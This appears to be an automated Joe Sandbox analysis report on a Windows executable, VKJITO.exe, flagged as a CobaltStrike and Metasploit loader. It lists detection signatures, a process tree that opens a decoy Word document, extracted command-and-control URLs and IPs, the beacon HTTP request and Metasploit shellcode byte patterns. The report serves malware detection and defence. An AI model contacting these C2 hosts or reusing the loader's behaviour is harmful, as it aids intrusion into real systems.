Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VKJITO.exe

Overview

General Information

Sample name:VKJITO.exe
Analysis ID:1577651
MD5:34bfa047aaca8fd4dc99759ebf0e1a6a
SHA1:ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
SHA256:517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
Tags:exeuser-smica83
Infos:

Detection

CobaltStrike, Metasploit
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected landing page (webpage, office document or email)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • VKJITO.exe (PID: 3056 cmdline: "C:\Users\user\Desktop\VKJITO.exe" MD5: 34BFA047AACA8FD4DC99759EBF0E1A6A)
    • curl.exe (PID: 4068 cmdline: "curl" ip.sb MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7092 cmdline: "cmd" /c start C:\Users\user\Desktop\???????.docx MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 4308 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • WerFault.exe (PID: 1656 cmdline: C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x1900b:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x19077:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        Click to see the 3 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Communication To Uncommon Destination Ports
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 139.159.139.109, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\VKJITO.exe, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
        Multi AV Scanner detection for submitted file
        Source: VKJITO.exeReversingLabs: Detection: 42%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4342940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4349A10 BCryptGenRandom,0_2_00007FF7D4349A10

        Phishing

        barindex
        AI detected landing page (webpage, office document or email)
        Source: Screenshot id: 9Joe Sandbox AI: Screenshot id: 9 contains prominent button: 'download'
        Source: Screenshot id: 10Joe Sandbox AI: Screenshot id: 10 contains prominent button: 'download'
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: winword.exeMemory has grown: Private usage: 1MB later: 82MB

        Networking

        barindex
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: http://39.159.139.109:8080/uz68
        Source: Malware configuration extractorURLs: http://139.159.139.109/uz68
        Source: global trafficTCP traffic: 192.168.2.5:49707 -> 139.159.139.109:8080
        Source: Joe Sandbox ViewIP Address: 104.26.12.31 104.26.12.31
        Source: Joe Sandbox ViewASN Name: HWCSNETHuaweiCloudServicedatacenterCN HWCSNETHuaweiCloudServicedatacenterCN
        Source: global trafficHTTP traffic detected: GET /uz68 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Host: 139.159.139.109:8080Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip.sbUser-Agent: curl/7.83.1Accept: */*
        Source: global trafficHTTP traffic detected: GET /uz68 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Host: 139.159.139.109:8080Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: ip.sb
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmp, VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68cex
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68fap
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68g
        Source: curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/
        Source: curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/00005
        Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4340E60 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7D4340E60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431CEC0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,0_2_00007FF7D431CEC0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4340D00 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7D4340D00
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43442F00_2_00007FF7D43442F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43429400_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431B5900_2_00007FF7D431B590
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43495300_2_00007FF7D4349530
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43125400_2_00007FF7D4312540
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43505B00_2_00007FF7D43505B0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43395C00_2_00007FF7D43395C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434E6700_2_00007FF7D434E670
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43166500_2_00007FF7D4316650
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43526A00_2_00007FF7D43526A0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43526D30_2_00007FF7D43526D3
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434F7200_2_00007FF7D434F720
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43218800_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43508800_2_00007FF7D4350880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432390F0_2_00007FF7D432390F
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43208B90_2_00007FF7D43208B9
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43421900_2_00007FF7D4342190
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43401200_2_00007FF7D4340120
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432E1E00_2_00007FF7D432E1E0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434E2000_2_00007FF7D434E200
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431F1C00_2_00007FF7D431F1C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434D1C00_2_00007FF7D434D1C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434D3300_2_00007FF7D434D330
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431E3490_2_00007FF7D431E349
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43553E00_2_00007FF7D43553E0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435D3D00_2_00007FF7D435D3D0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43594900_2_00007FF7D4359490
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434F4300_2_00007FF7D434F430
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43264400_2_00007FF7D4326440
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4350D800_2_00007FF7D4350D80
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4318D400_2_00007FF7D4318D40
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4314DF00_2_00007FF7D4314DF0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4327E600_2_00007FF7D4327E60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434EEE00_2_00007FF7D434EEE0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43520700_2_00007FF7D4352070
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434C0800_2_00007FF7D434C080
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432B0400_2_00007FF7D432B040
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434D0400_2_00007FF7D434D040
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43140F00_2_00007FF7D43140F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43500F00_2_00007FF7D43500F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432F9F00_2_00007FF7D432F9F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434F9D00_2_00007FF7D434F9D0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432AA600_2_00007FF7D432AA60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4327A800_2_00007FF7D4327A80
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4353AE00_2_00007FF7D4353AE0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4350AB00_2_00007FF7D4350AB0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4341CD00_2_00007FF7D4341CD0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434FCD00_2_00007FF7D434FCD0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF7D432A450 appears 73 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF7D4312AC0 appears 64 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF7D435C330 appears 47 times
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: classification engineClassification label: mal92.troj.winEXE@12/235@1/3
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43208B9 memset,GetModuleHandleW,FormatMessageW,memmove,GetLastError,0_2_00007FF7D43208B9
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeFile created: C:\Users\user\Desktop\???????.docxJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3056
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{E0D17D01-5636-4B1F-B917-5E8F8067BDEC} - OProcSessId.datJump to behavior
        Source: VKJITO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: VKJITO.exeReversingLabs: Detection: 42%
        Source: unknownProcess created: C:\Users\user\Desktop\VKJITO.exe "C:\Users\user\Desktop\VKJITO.exe"
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sbJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docxJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp140.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
